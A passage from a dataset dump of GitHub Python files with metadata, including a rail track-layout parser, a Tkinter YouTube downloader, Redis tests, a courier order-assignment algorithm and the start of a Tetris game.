\"SWITCH\" in row['Infrastructure']:\n controller['switch-state'].append((row['Block Number'], row['Section'], False))\n\n ## populate crossing-state\n if row['Infrastructure'] != None and \"CROSSING\" in row['Infrastructure']:\n controller['crossing-state'].append((row['Block Number'], row['Section'], False))\n\n if size > 0:\n if TOTAL_BLOCKS % numBlocksPerController == 0:\n CONTROLLERS.append(deepcopy(controller))\n controller['block-occupancy'].clear()\n controller['crossing-state'].clear()\n controller['switch-state'].clear()\n controller['total-blocks'] = 0\n\n CONTROLLERS.append(deepcopy(controller))\n\n file.close()\n return CONTROLLERS\n\nif __name__ == '__main__':\n print(parseTrackLayout(\"Track Layout & Vehicle Data vF.xlsx - Green Line.csv\"))","repo_name":"vism2889/ECE_1140_TRAINS","sub_path":"Pittsburgh-Light-Rail-App/WaysideController/ui/presentation/track_layout/extract_layout.py","file_name":"extract_layout.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"10617235716","text":"import os\nimport pandas as pd \nimport numpy as np\n\ntaxo_names=\"taxo_names.txt\"\ntaxo_DB=\"131-combined_database_metadata.txt\"\n\nif not os.path.exists(taxo_names):\n df=pd.read_table(taxo_DB) \n #df[\"Strain of origin\"]=[str(i).replace(\".\",\"\") for i in df[\"Strain of origin\"]]\n taxa=df[\"Strain of origin\"].astype(np.string_)\n f=lambda x: \"_\".join(x.decode().replace(\".\",\"\").split()[:2])\n taxa=taxa.apply(f)\n counts=taxa.value_counts()\n top_199=counts[:199]\n top_199=top_199.sort_index()\n top_199.to_csv(taxo_names,sep=\"\\t\")\n\nelse:\n top_199=pd.Series.from_csv(taxo_names,sep=\"\\t\")\n\n\n###Now construct a DataFrame\nnum_taxa=len(top_199)\nbitReps=[str(1<1:\n \n sample1=np.random.choice(list(allowed_samples))\n allowed_samples.remove(sample1)\n sample2=np.random.choice(list(allowed_samples))\n \n Newick1,Newick2=dataStruct.loc[sample1,\"Newick_rep\"],dataStruct.loc[sample2,\"Newick_rep\"]\n combined_Newick=\"({},{})\".format(Newick1,Newick2)\n \n bitRep1,bitRep2=dataStruct.loc[sample1,\"bitRep\"],dataStruct.loc[sample2,\"bitRep\"]\n combined_bitRep=int(bitRep1)|int(bitRep2)\n bitRep_toAppend=bin(combined_bitRep)[2:].zfill(num_taxa)\n true_bitArray.append(bitRep_toAppend)\n\n ##Replace the construct that can still be sampled with combined values\n dataStruct.loc[sample2,\"Newick_rep\"]=combined_Newick\n dataStruct.loc[sample2,\"bitRep\"]=str(combined_bitRep)\n\n ##Write out to file\n fiii.write(bitRep_toAppend+\"\\n\")\n\n Newick_out=combined_Newick.replace(\"(\",\"\").replace(\")\",\"\").split(\",\")\n fiii.write(\"\\t\".join(Newick_out)+\"\\n\")\n\nfiii.close()\n\n# print(combined_Newick)\n\n#Remove the last bitArray which is all 1's\ntrue_bitArray.pop()\n\nlast_sample=list(allowed_samples)[0]\nfinal_Newick=dataStruct.loc[last_sample,\"Newick_rep\"]\n\nwith open(\"simulated_problem.txt\",\"w\") as f:\n f.write(final_Newick)\n\nwith open(\"simulated_solution.txt\",\"w\") as f:\n f.write(\"\\n\".join(true_bitArray))\n","repo_name":"bricoletc/ctbl","sub_path":"simu/build_simu.py","file_name":"build_simu.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34618402945","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 28 16:36:36 2020\n\n@author: Fin Christie\n\"\"\"\n\nimport pandas as pd\n\ndf = pd.read_csv (r\"C:\\Users\\Fin Christie\\Documents\\Uni\\4th Year\\EM401\\Data\\Data from Graeme's Sharefile\\2019\\BAVs.csv\")\ndf_list = df['T_KILBW-1'].tolist()\naggregated_data = []\nhourly_data = []\n\nfor row, val in enumerate(df_list):\n hourly_data.append(df_list[row])\n \n if len(hourly_data) == 2:\n aggregated_data.append((sum(hourly_data)*1000))\n hourly_data.clear()\n \n \n \n ","repo_name":"FinChristie/Green_Hydrogen_Production_Project","sub_path":"DataConv.py","file_name":"DataConv.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"617467333","text":"import GRT\nimport sys\nimport math\n\ndef main():\n # Create a new instance of an FFT with a window size of 256 and a hop size of 1 for a 1 dimensional signal\n # Note, it is important that when you use an FFT with the FFTFeatures module that the FFT module computes the magnitude, but does not compute the phase\n fftWindowSize = 256\n fftHopSize = 1\n numInputDimensions = 1\n computeMagnitude = True\n computePhase = False\n fft = GRT.FFT(fftWindowSize,fftHopSize,numInputDimensions,GRT.FFT.RECTANGULAR_WINDOW,computeMagnitude,computePhase)\n\n # Create a new fftFeatures instance and pass in the size of the FFT window and the number of input dimensions to the FFT instance\n fftFeatures = GRT.FFTFeatures(int(fft.getFFTWindowSize()/2),numInputDimensions)\n\n # Create some varaibles to help generate the signal data\n numSeconds = 10 # The number of seconds of data we want to generate\n t = 0.0 # This keeps track of the time\n tStep = 1.0/1000.0 # This is how much the time will be updated at each iteration in the for loop\n freq = 100.0 # Stores the frequency\n\n # Generate the signal and filter the data\n for i in range(numSeconds*1000):\n\n # Generate the signal\n signal = math.sin( t * math.tau * freq )\n \n # Compute the FFT of the input signal\n fft.update( signal )\n \n # Compute the features from the FFT\n fftFeatures.computeFeatures( fft.getFeatureVector() )\n \n # Get the feature vector from the FFT features instance and print the values\n print(fftFeatures.getFeatureVector())\n\n # Update the t\n t += tStep\n \n \n # Save the settings to a file\n if not fftFeatures.save( \"FFTFeatures.grt\" ):\n print(\"Error: Failed to save fft features to settings file!\")\n sys.exit(1)\n \n\n # Load the setting back from a file again\n if not fftFeatures.load( \"FFTFeatures.grt\" ):\n print(\"Error: Failed to load fft features from settings file!\")\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)","repo_name":"nickgillian/grt","sub_path":"build/python/examples/FeatureExtractionModulesExamples/FFT_features_example.py","file_name":"FFT_features_example.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"11707917690","text":"import os\nimport unittest\nfrom unittest.case import skipIf\n\nfrom store import Store\n\nredis_host = os.environ.get(\"REDIS_HOST\", False)\nredis_port = os.environ.get(\"REDIS_PORT\", False)\n\n\n@skipIf(not (redis_host and redis_port), \"Store connection parameters weren't passed\")\nclass TestStore(unittest.TestCase):\n def setUp(self):\n self.store = Store(host=redis_host, port=redis_port)\n\n def test_get(self):\n expected_value = \"value from redis\"\n key = \"key_1\"\n\n self.store.set(key, expected_value, 60 * 60)\n\n res = self.store.get(key).decode(\"utf-8\")\n self.assertEqual(res, expected_value)\n\n def test_cache_get(self):\n expected_value = \"value from redis\"\n key = \"key_2\"\n\n self.store.set(key, expected_value, 60 * 60)\n\n res = self.store.cache_get(key).decode(\"utf-8\")\n\n self.assertEqual(res, expected_value)\n\n def test_cache_set(self):\n expected_value = \"value from redis\"\n key = \"key_3\"\n\n self.store.cache_set(key, expected_value, 60 * 60)\n\n res = self.store.cache_get(key).decode(\"utf-8\")\n\n self.assertEqual(res, expected_value)\n","repo_name":"tatiana-vakhrameeva/python-course","sub_path":"hw3-1/tests/integration/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5189342959","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass BaseModel(models.Model):\n\n class Meta:\n abstract = True\n\n active = models.BooleanField(default=True)\n created_by = models.ForeignKey(\n User,\n blank=True,\n null=True,\n on_delete=models.CASCADE,\n related_name=\"%(class)s_created_by\",\n )\n created_on = models.DateTimeField(auto_now_add=True)\n updated_by = models.ForeignKey(\n User,\n blank=True,\n null=True,\n on_delete=models.CASCADE,\n related_name=\"%(class)s_updated_by\"\n )\n updated_on = models.DateTimeField(auto_now=True)","repo_name":"FSC-Portfolio/chalkerone","sub_path":"api_v0/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17053259732","text":"from setuptools import setup\n\nfrom pybib import __version__\n\nwith open('README.rst') as f:\n readme = f.read()\n\nsetup(name='pybib',\n version=__version__,\n description='Fetch citation information, given a Digital Object Identifier',\n long_description=readme,\n url='https://github.com/jgilchrist/pybib',\n author='Jonny Gilchrist',\n packages=['pybib'],\n install_requires=[\n 'requests',\n 'python-termstyle',\n ],\n entry_points = {\n 'console_scripts': [\n 'bib = pybib:main'\n ]\n }\n)\n","repo_name":"amir17688/google_data_p2","sub_path":"76613_setup.py_C__Users_user_Desktop_data_2_data_google_data_jgilchrist_pybib.py","file_name":"76613_setup.py_C__Users_user_Desktop_data_2_data_google_data_jgilchrist_pybib.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37996270866","text":"from tkinter import *\nfrom tkinter.ttk import *\nimport tkinter.messagebox as tmsg\nfrom pytube import YouTube\nroot = Tk()\n\ncheck = False\ndefaultPath = \"C:/Users/Lenovo/Desktop/Coding/Tkinter/chat-gpt\"\n\n# All Logic\n# Add path where to stored download\ndef addPath():\n # Geometry and title\n newWindow = Toplevel(root)\n newWindow.geometry(\"600x700\")\n newWindow.title(\"YouTube Downloader Tool\")\n\n # width,height\n newWindow.minsize(300,300)\n\n # width,height\n newWindow.maxsize(300,300)\n\n newWindow.wm_iconbitmap(\"youtube.ico\")\n\n # Add path Gui\n global pathValue\n pathLabel = Label(newWindow, text=\"Add Path\").pack(padx=10,pady=4)\n pathValue = StringVar()\n with open(\"path.txt\", \"r\") as f: \n data = f.read()\n if(len(data)>0):\n pathValue.set(data)\n pathEntry = Entry(newWindow, textvariable=pathValue).pack(pady=2)\n addBtn = Button(newWindow, text=\"Add\", command=Add).pack(pady=2)\n\n# adding path to a path.txt \ndef Add(): \n f = open(\"path.txt\", \"w\")\n f.write(pathValue.get())\n f.close()\n tmsg.showinfo(\"Added\", \"Your path is Added\")\n\n# About of this project\ndef about():\n tmsg.showinfo(\"About\", \"\"\"This is a youtube video Downloader in which you can download video. You can download one video at one time. You can't download age-restriction video.\"\"\")\n\n# Choose in which format object will downlaod(audio or video, both(Video))\ndef Format():\n global check\n if(len(urlVar.get())>0):\n if(len(var_type.get())>0): \n statusvar.set(\"Waiting...\")\n sbar.update() \n link = urlVar.get()\n try:\n youtube = YouTube(link)\n except:\n tmsg.showinfo(\"Error!\", \"Somethings wrong maybe you entered wrong url or internet issue.\")\n statusvar.set(\"Ready\")\n else:\n global title\n global videos\n global yt_length\n title = youtube.title \n yt_length = str(youtube.length) \n\n if(var_type.get()==\"Audio\"):\n lbx.delete(0, END)\n try:\n videos = youtube.streams.filter(only_audio=True)\n except:\n tmsg.showinfo(\"Error!\", \"This video can't be download because of age restricted in thsi video.\")\n statusvar.set(\"Ready\")\n else: \n check = True\n vid = list(enumerate(videos))\n for i in vid: \n lbx.insert(ACTIVE, i)\n\n elif(var_type.get()==\"Video\"):\n lbx.delete(0, END)\n try:\n videos = youtube.streams.filter(only_video=True)\n except: \n tmsg.showinfo(\"Error!\", \"This video can't be download because of age restricted in thsi video.\")\n statusvar.set(\"Ready\")\n else: \n check = True\n vid = list(enumerate(videos))\n for i in vid: \n lbx.insert(ACTIVE, i)\n\n else:\n lbx.delete(0, END)\n try:\n videos = youtube.streams.filter(progressive=True)\n except: \n tmsg.showinfo(\"Error!\", \"This video can't be download because of age restriction in this video.\")\n statusvar.set(\"Ready\")\n else:\n check = True\n vid = list(enumerate(videos))\n for i in vid: \n lbx.insert(ACTIVE, i)\n \n if(check==True): \n typebar.set(\"(Title): \"+title+\" \"+\" \\n(\"+yt_length+\" seconds)\") \n type_video.pack(pady=15, anchor=CENTER)\n lbx.pack(fill=X)\n download.pack(pady=8,anchor=CENTER)\n downloadEntry.pack(anchor=CENTER)\n dPath.pack(pady=4,anchor=CENTER)\n downloadBtn.pack(pady=2,anchor=CENTER)\n statusvar.set(\"Ready\")\n\n# Downloading Function\ndef downloading():\n val = downloadVar.get()\n if(len(val)>0):\n val = int(val)\n statusvar.set(\"downloading...\")\n sbar.update() \n\n try:\n if(dVar.get()==0):\n try: \n with open(\"path.txt\", \"r\") as f:\n data = f.read()\n if(len(data)>0):\n videos[val].download(data) \n else:\n videos[val].download(defaultPath) \n except:\n videos[val].download(defaultPath) \n elif(dVar.get()==1):\n videos[val].download(defaultPath) \n except:\n tmsg.showinfo(\"Error\", \"Somethings wrong maybe you entered wrong No.(integer) or internet issue.\")\n statusvar.set(\"Ready\")\n else: \n statusvar.set(\"Ready\")\n tmsg.showinfo(\"Download\", \"Your content is downloaded\")\n\n\n# Geometry and title\nroot.geometry(\"600x700\")\nroot.title(\"YouTube Downloader Tool\")\n\n# width,height\nroot.minsize(600,700)\n\n# width,height\nroot.maxsize(600,700)\n\nroot.wm_iconbitmap(\"youtube.ico\")\n\n# Menus and submenu\nmainmenu = Menu(root)\nm1 = Menu(mainmenu, tearoff=0)\nm1.add_command(label=\"Add download path\", command=addPath)\nroot.config(menu=mainmenu)\nmainmenu.add_cascade(label='File', menu=m1)\n\nmainmenu.add_command(label=\"About\", command=about)\nroot.config(menu=mainmenu)\n\nmainmenu.add_command(label=\"Exit\", command=quit)\nroot.config(menu=mainmenu)\n\n# Url of Youtube Video\nurl = Label(root, text=\"Enter Url\").pack(pady=4,anchor=CENTER)\nurlVar = StringVar()\nurlEntry = Entry(root, textvariable=urlVar).pack(anchor=CENTER)\n\n# show audio or video \nvar_type = StringVar()\nradio = Radiobutton(root, text=\"Audio(Only)\", variable=var_type, value=\"Audio\").pack(pady=4)\nradio = Radiobutton(root, text=\"Video(Only)\", variable=var_type, value=\"Video\").pack()\nradio = Radiobutton(root, text=\"Video(Both)\", variable=var_type, value=\"VideoB\").pack(padx=8,pady=3)\nurlBtn = Button(root, text=\"Choose Format\", command=Format).pack(pady=2,anchor=CENTER)\n\n# Type of video label\ntypebar = StringVar()\ntype_video = Label(root, textvariable=typebar)\nlbx = Listbox(root)\n\n# input in (int) for downloading\ndownload = Label(root, text=\"Enter No.\")\ndownloadVar = StringVar()\ndownloadEntry = Entry(root, textvariable=downloadVar)\ndVar = IntVar()\ndPath = Checkbutton(text=\"Want to download in default path ?\", variable = dVar)\ndownloadBtn = Button(root, text=\"download\", command=downloading)\n\n\n# Status Bar\nstatusvar = StringVar()\nstatusvar.set(\"Ready\")\nsbar = Label(root, textvariable=statusvar, relief=SUNKEN, anchor=\"w\")\nsbar.pack(side=BOTTOM, fill=X)\n\n# Note for users\nnote = Label(root, text=''' Note: \\n 1. If you have to downlaod content then you have to choose number(integer) eg-1,2,3,0 then it will downloaded. \\n\n 2. If you provide path then content will saved on your given specific path rather than default path(if you checked). \\n\n 3. If you don't provide path then content will saved in default location(if not checked).''').pack(side=BOTTOM, pady=30)\n\nroot.mainloop()","repo_name":"MrRiteshKode/Youtube-video-downloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74619566007","text":"import numpy as np\nfrom CompetitionBot.create_ds_for_annotations import get_reference_documents\nimport matplotlib.pyplot as plt\nimport os\nimport pickle\n\n\ndef read_file(reference_docs,file,index,stats):\n\n with open(file) as f:\n for line in f:\n query = line.split()[0]\n doc = line.split()[1].split(\"-\")[3]\n similarity = float(line.split()[3].rstrip())\n if doc in reference_docs[query]:\n if index not in stats[\"Bot\"]:\n stats[\"Bot\"][index]={}\n if query not in stats[\"Bot\"][index]:\n\n stats[\"Bot\"][index][query]=[]\n stats[\"Bot\"][index][query].append(similarity)\n elif doc.__contains__(\"dummy_doc\"):\n if index not in stats[\"Dummy\"]:\n stats[\"Dummy\"][index]={}\n if query not in stats[\"Dummy\"][index]:\n\n stats[\"Dummy\"][index][query]=[]\n stats[\"Dummy\"][index][query].append(similarity)\n else:\n if index not in stats[\"Active\"]:\n stats[\"Active\"][index]={}\n if query not in stats[\"Active\"][index]:\n\n stats[\"Active\"][index][query]=[]\n stats[\"Active\"][index][query].append(similarity)\n for group in stats:\n for query in stats[group][index]:\n stats[group][index][query] = np.mean(stats[group][index][query])\n stats[group][index]=np.mean([stats[group][index][q] for q in stats[group][index]])\n return stats\n\ndef gather_stats(dir):\n stats = {\"Bot\": {}, \"Active\": {}, \"Dummy\": {}}\n f = open(\"ref_docs\",\"rb\")\n ref_docs=pickle.load(f)\n f.close()\n\n # pickle.dump(ref_docs,open(\"ref_docs\",\"wb\"))\n for file in os.listdir(dir):\n index = file.split(\"_\")[2]\n stats = read_file(ref_docs,dir+\"/\"+file,index,stats)\n return stats\n\n\ndef create_graph(stats):\n params = {'legend.fontsize': 'x-large',\n 'figure.figsize': (10, 7),\n 'axes.labelsize': 'x-large',\n 'axes.titlesize': 'x-large',\n 'xtick.labelsize': 'x-large',\n 'ytick.labelsize': 'x-large',\n 'font.family': 'serif'}\n plt.rcParams.update(params)\n group_name_dict = {\"Bot\": \"Bot\", \"Active\": \"Students\", \"static\": \"Static\", \"top\": \"S-T\",\"Dummy\":\"Planted\"}\n colors_dict = {\"Bot\": \"b\", \"Active\": \"r\", \"static\": \"y\", \"top\": \"k\",\"Dummy\":\"mediumslateblue\"}\n dot_dict = {\"Bot\": \"-o\", \"Active\": \"--^\", \"static\": \":p\", \"top\": \"-.x\",\"Dummy\":\"-.+\"}\n\n\n plt.figure()\n\n x = [j + 2 for j in range(len(stats[\"Bot\"]))]\n for group in stats:\n y = [stats[group][i] for i in sorted(list(stats[group].keys()))]\n\n plt.plot(x, y, dot_dict[group], label=group_name_dict[group], color=colors_dict[group], linewidth=5,\n markersize=10, mew=1)\n plt.xticks(x, fontsize=18)\n plt.yticks(fontsize=18)\n plt.ylabel(\"Cosine\", fontsize=25)\n plt.xlabel(\"Rounds\", fontsize=25)\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.11),\n ncol=5, fontsize=20, frameon=False)\n plt.savefig(\"similarity_to_winner.pdf\", format=\"pdf\")\n plt.clf()\n\nstats = gather_stats(\"similarity_data/\")\ncreate_graph(stats)","repo_name":"greggoren/auto_seo","sub_path":"CompetitionBot/analyze_similarity.py","file_name":"analyze_similarity.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72014385528","text":"import datetime\nfrom typing import List\n\nfrom fastapi import HTTPException\nfrom starlette import status\n\nfrom app.database.__models import Order, DistributedOrders, Courier\nfrom app.database.db_session import create_session\nfrom app.schemas.__couriers import GetCouriersModel\nfrom app.schemas.__orders import GetOrderModel\nfrom app.schemas.__assignment import AssignmentInfoModel\nfrom app.utils.time import split_time, HH_MM\nfrom app.view.couriers import get_all_couriers, get_courier_by_id\nfrom app.view.orders import get_all_orders, get_order_by_id\n\nCOURIER_ASSIGNMENT_INFO = {'FOOT': [2, 10, 25, 10], 'BIKE': [4, 20, 12, 8], 'AUTO': [7, 40, 8, 4]}\n\nCOURIER_ORDER_GROUP = {}\nORDERS_IN_PROCESS = {}\n\n\n# чем больше интервал, тем менее срочный заказ,\n# чем больше стоимость, тем менее срочный заказ\ndef metric(cost: int, wh: str, dh: str) -> float:\n courier_start_time = split_time(wh, to_intervals=True)[0]\n order_end_time = split_time(dh, to_intervals=True)[1]\n\n return cost * (order_end_time - courier_start_time) / datetime.timedelta(minutes=3600)\n\n\n# оптимизированный жадный алгоритм при помощи эвристики и двух указателей\nasync def greedy(couriers: GetCouriersModel, type_params: List[int], number_of_all_orders: int):\n orders_in_group, weight, first_time_order, rest_time_orders = type_params\n\n # подготавливаем параметры\n orders_in_group -= 1\n first_time_order = datetime.timedelta(minutes=first_time_order)\n rest_time_orders = datetime.timedelta(minutes=rest_time_orders)\n\n for courier in couriers.couriers:\n courier_groups = []\n for wh in courier.working_hours:\n courier_start_time, courier_end_time = split_time(wh, to_intervals=True)\n # за такое время работы курьера нельзя доставить ни один заказ\n if courier_end_time - courier_start_time < first_time_order:\n continue\n\n possible_orders = await get_all_orders(limit=number_of_all_orders,\n offset=0, time_interval=wh,\n regions=courier.regions, weight=weight)\n\n possible_orders_with_duplicates = []\n\n for order in possible_orders.orders:\n if ORDERS_IN_PROCESS.get(order.order_id) == 1:\n continue\n if order.completed_time is not None:\n continue\n for dh in order.delivery_hours:\n # курьер не успеет доставить заказ, даже если начнет работать сразу\n order_start_time, order_end_time = split_time(dh, to_intervals=True)\n if order_end_time - courier_start_time < first_time_order:\n continue\n\n order_data = {'order_id': order.order_id,\n 'weight': order.weight,\n 'region': order.region,\n 'delivery_hours': [dh],\n 'cost': order.cost,\n 'completed_time': None}\n possible_orders_with_duplicates.append(GetOrderModel.parse_obj(order_data))\n\n possible_orders_with_duplicates = sorted(possible_orders_with_duplicates,\n key=lambda data: metric(data.cost, wh, data.delivery_hours[0]))\n\n i, j = 0, len(possible_orders_with_duplicates) - 1\n\n cur_time = courier_start_time\n cur_weight = weight\n courier_group = []\n\n while i < j:\n # распределение первого заказа в группе\n\n # скипаем уже взятые заказы\n while i < j and ORDERS_IN_PROCESS.get(possible_orders_with_duplicates[i].order_id) == 1:\n i += 1\n\n first_order = possible_orders_with_duplicates[i]\n\n # проверка на то, что заказ уже находится в исполнении\n if ORDERS_IN_PROCESS.get(first_order.order_id) == 1:\n i += 1\n continue\n\n # проверка веса\n if cur_weight - first_order.weight < 0:\n i += 1\n continue\n\n # проверки подходимости по времени\n first_order_start_time, first_order_end_time = \\\n split_time(first_order.delivery_hours[0], to_intervals=True)\n\n if first_order_start_time <= cur_time + first_time_order <= first_order_end_time:\n if cur_time + first_time_order > courier_end_time:\n i += 1\n continue\n cur_time += first_time_order\n courier_group.append([cur_time, first_order])\n cur_weight -= first_order.weight\n i += 1\n ORDERS_IN_PROCESS[first_order.order_id] = 1\n elif first_order_start_time > cur_time + first_time_order:\n if first_order_start_time - first_time_order > courier_end_time:\n i += 1\n continue\n cur_time = first_order_start_time - first_time_order\n continue\n else:\n i += 1\n continue\n\n # счетчик последующих заказов\n count = 0\n # набираем группу с количеством - 1, потому что первый заказ уже взяли\n while i < j and count < orders_in_group:\n # скипаем все те заказы, которые уже взяты\n while i < j and ORDERS_IN_PROCESS.get(possible_orders_with_duplicates[j].order_id) == 1:\n j -= 1\n if j == i:\n break\n next_order = possible_orders_with_duplicates[j]\n\n # проверка на то, что заказ находится в исполнении\n if ORDERS_IN_PROCESS.get(next_order.order_id) == 1:\n j -= 1\n continue\n\n # весовая проверка\n if cur_weight - next_order.weight < 0:\n j -= 1\n if j == i:\n break\n continue\n\n next_order_start_time, next_order_end_time = split_time(next_order.delivery_hours[0],\n to_intervals=True)\n\n # временная проверка\n if next_order_start_time <= cur_time + rest_time_orders <= next_order_end_time:\n if cur_time + rest_time_orders > courier_end_time:\n j -= 1\n if j == i:\n break\n continue\n cur_time += rest_time_orders\n courier_group.append([cur_time, next_order])\n cur_weight -= next_order.weight\n j -= 1\n ORDERS_IN_PROCESS[next_order.order_id] = 1\n elif next_order_start_time > cur_time + rest_time_orders:\n if next_order_start_time - rest_time_orders > courier_end_time:\n j -= 1\n if j == i:\n break\n continue\n cur_time = next_order_start_time - rest_time_orders\n continue\n else:\n j -= 1\n if j == i:\n break\n continue\n count += 1\n courier_groups.append(courier_group)\n courier_group = []\n cur_weight = weight\n\n if j - i == 1:\n break\n i, j = 0, len(possible_orders_with_duplicates) - 1\n COURIER_ORDER_GROUP[courier.courier_id] = courier_groups\n\n\nasync def distribute_orders() -> AssignmentInfoModel:\n session = create_session()\n\n number_of_all_orders = session.query(Order).count()\n\n for courier_type in COURIER_ASSIGNMENT_INFO: # 3 times\n number_of_couriers_of_type = list(session.query(Courier).filter(Courier.courier_type == courier_type))\n if number_of_couriers_of_type:\n number_of_couriers_of_type = number_of_couriers_of_type[-1].id\n else:\n number_of_couriers_of_type = 1\n couriers = await get_all_couriers(limit=number_of_couriers_of_type,\n offset=0, courier_type=courier_type)\n await greedy(couriers, COURIER_ASSIGNMENT_INFO[courier_type], number_of_all_orders)\n\n assignment_info = {'date': datetime.date.today(), 'couriers': []}\n\n for courier in COURIER_ORDER_GROUP.keys():\n courier_info = {'courier_id': courier, 'orders': []}\n group_order_id = 1\n\n for order_group in COURIER_ORDER_GROUP[courier]:\n order_group_info = {'group_order_id': group_order_id, 'orders': []}\n next_order_cost = 1.0\n\n for order_data in order_group:\n predictable_time, order = order_data\n predictable_time = predictable_time.time()\n start_time, end_time = split_time(order.delivery_hours[0])\n\n new_order = DistributedOrders(order_id=order.order_id, courier_id=courier,\n group_order_id=group_order_id,\n date=datetime.date.today(),\n start_time=start_time,\n end_time=end_time, predictable_time=predictable_time,\n after_fact_time=None,\n earnings=order.cost * next_order_cost)\n session.add(new_order)\n\n next_order_cost = 0.8\n order_info = {'order_id': order.order_id, 'weight': order.weight, 'region': order.region,\n 'delivery_hours': order.delivery_hours, 'cost': order.cost, 'completed_time': None}\n\n order_group_info['orders'].append(order_info)\n group_order_id += 1\n\n courier_info['orders'].append(order_group_info)\n assignment_info['couriers'].append(courier_info)\n\n COURIER_ORDER_GROUP.clear()\n ORDERS_IN_PROCESS.clear()\n session.commit()\n\n return AssignmentInfoModel.parse_obj(assignment_info)\n\n\nasync def get_all_assignment_info(date: datetime.date = datetime.date.today(),\n courier_id: int = None) -> AssignmentInfoModel:\n session = create_session()\n\n if not date <= datetime.date.today():\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n if courier_id:\n try:\n await get_courier_by_id(courier_id)\n except HTTPException:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST)\n\n assignment_data = session.query(DistributedOrders).filter(DistributedOrders.date == date)\n if courier_id:\n assignment_data = assignment_data.filter(DistributedOrders.courier_id == courier_id)\n assignment_data = list(assignment_data)\n\n assignment_info = {'date': date, 'couriers': []}\n\n couriers_info = {}\n if not courier_id:\n for courier in session.query(Courier).all():\n if couriers_info.get(courier.id) is None:\n couriers_info[courier.id] = {'orders': {}}\n else:\n couriers_info[courier_id] = {'orders': {}}\n\n for entry in assignment_data:\n if couriers_info[entry.courier_id]['orders'].get(entry.group_order_id) is None:\n couriers_info[entry.courier_id]['orders'][entry.group_order_id] = {'orders': {}}\n\n for entry in assignment_data:\n order_info = await get_order_by_id(entry.order_id)\n if couriers_info[entry.courier_id]['orders'][entry.group_order_id].get(entry.order_id) is None:\n couriers_info[entry.courier_id]['orders'][entry.group_order_id]['orders'][entry.order_id] = \\\n {'weight': order_info.weight,\n 'region': order_info.region,\n 'delivery_hours': [entry.start_time.strftime(HH_MM) + '-' + entry.end_time.strftime(HH_MM)],\n 'cost': order_info.cost,\n 'completed_time': order_info.completed_time}\n\n for courier in couriers_info.keys():\n assignment_info['couriers'].append({'courier_id': courier, 'orders': []})\n\n for courier in assignment_info['couriers']:\n cur_courier_id = courier['courier_id']\n for group_order_id in couriers_info[cur_courier_id]['orders'].keys():\n courier['orders'].append({'group_order_id': group_order_id, 'orders': []})\n\n for courier in assignment_info['couriers']:\n cur_courier_id = courier['courier_id']\n for orders in courier['orders']:\n cur_group_order_id = orders['group_order_id']\n for order in couriers_info[cur_courier_id]['orders'][cur_group_order_id]['orders'].keys():\n real_order = couriers_info[cur_courier_id]['orders'][cur_group_order_id]['orders'][order]\n orders['orders'].append(\n {'order_id': order, 'weight': real_order['weight'], 'region': real_order['region'],\n 'delivery_hours': real_order['delivery_hours'], 'cost': real_order['cost'],\n 'completed_time': real_order['completed_time']})\n\n return AssignmentInfoModel.parse_obj(assignment_info)\n","repo_name":"Rudadadadada/Yandex.Lavka","sub_path":"app/view/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":14284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30338381556","text":"# -*- coding: utf-8 -*-\n# C - Attack Survival\n# https://atcoder.jp/contests/abc141/tasks/abc141_c\n\nN, K, Q = map(int, input().split())\nans = ['No'] * N\ns_array = [K] * N\nc_array = [0] * N\n\nfor i in range(Q):\n A = int(input())\n c_array[A-1] += 1\n\nsum_array = sum(c_array)\n\nfor i in range(N):\n calc = s_array[i] + c_array[i] - sum_array\n if calc > 0:\n ans[i] = 'Yes'\n\nprint(*ans, sep='\\n')\n\n# 16:15 - 16:51(AC)\n","repo_name":"yu5shi8/AtCoder","sub_path":"ABC_C/ABC141C.py","file_name":"ABC141C.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37852514510","text":"from __future__ import absolute_import, division, print_function\r\nfrom tkinter import *\r\nimport numpy as np\r\nimport random\r\nfrom PIL import Image, ImageTk\r\nimport json\r\n\r\n\r\ndef newshape(holding):\r\n global shapes,dy,dx,shapetype,board,nextshape,nextshapes,shapeboard,held,holdshapes,gameplaying,degree,score,totalrowsfilled,level,delay,fx,fxx\r\n if not holding:\r\n held = False\r\n for x in range(4):\r\n canvas.delete(shapes[x])\r\n shapeboard[shapepoints[degree][shapetype][x] // 4 + dy +fxx[1]+ fx[1]][shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0] + fx[0]] = canvas.create_image(\r\n (shapepoints[degree][shapetype][x] % 4 + dx + 3 +fxx[0]+ fx[0]) * size,\r\n (shapepoints[degree][shapetype][x] // 